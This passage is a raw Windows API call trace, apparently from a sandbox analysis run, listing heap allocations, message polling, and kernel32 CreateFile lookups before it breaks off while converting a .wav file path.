HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.220] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.220] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.220] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.220] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.221] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.225] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.232] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd780 [0186.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd780, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.233] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0186.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.233] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\S1qr7.wav", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0186.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d) returned 0x9a5d78 [0186.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 